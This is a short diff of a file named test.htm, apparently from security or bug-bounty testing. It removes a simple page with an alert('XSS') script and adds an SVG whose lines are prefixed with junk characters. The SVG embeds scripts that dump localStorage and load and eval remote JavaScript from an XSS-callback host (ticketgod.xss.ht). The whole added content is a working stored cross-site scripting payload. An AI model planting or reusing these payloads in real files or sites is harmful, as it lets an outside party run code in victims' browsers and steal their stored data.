--- a/test.htm
+++ b/test.htm
@@ -1,8 +1,12 @@
-<html><head><title>title</title></head>
-<body>
-<video controls="" width="320" height="240">
-    <source src="video.mp4" type="video/mp4">
-</video> 
-<script>alert("XSS");</script>
-</body></html>
-
+$$$$$$$$$$$\\\\
+$$$$$$$$$$$\\\\<?xml version="1.0" standalone="no"?>
+$$$$$$$$$$$\\\\<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+$$$$$$$$$$$\\\\<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" >
+ $$$$$$$$$$$\\\\ <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
+$$$$$$$$$$$\\\\   <script type="text/javascript">
+    alert(JSON.stringify(localStorage));
+  </script>
+$$$$$$$$$$$\\\\   <script src='https://ticketgod.xss.ht'></script>
+$$$$$$$$$$$\\\\   <script>$.getScript("//ticketgod.xss.ht")</script>
+ $$$$$$$$$$$\\\\  <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ticketgod.xss.ht");a.send();</script>
+$$$$$$$$$$$\\\\<svg>
